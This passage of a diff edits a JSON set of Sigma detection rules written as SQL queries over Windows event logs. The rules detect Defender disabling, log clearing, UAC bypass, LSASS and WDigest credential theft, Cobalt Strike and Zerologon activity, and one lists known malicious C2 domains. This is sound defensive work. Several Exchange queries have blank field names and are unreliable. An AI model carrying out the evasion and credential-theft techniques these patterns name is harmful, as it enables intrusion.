"44a22d59-b175-4f13-8c16-cbaef5b581ff", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Administrator actions" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" - ], - "filename": "registry_set_disable_windows_defender_service.yml" - }, - { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. 
(see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "status": "experimental", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Standard domain users who are part of the administrator group. These users shouldn't have these right. 
But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "status": "test", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "status": "experimental", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": 
"registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND 
(TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 
'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - 
"filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_delete_all_rules.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], - "level": "critical", + "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. 
caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. 
UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ - "attack.persistence", - "attack.t1136.001" + 
"attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND 
HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", - "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1210", + "attack.lateral_movement" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 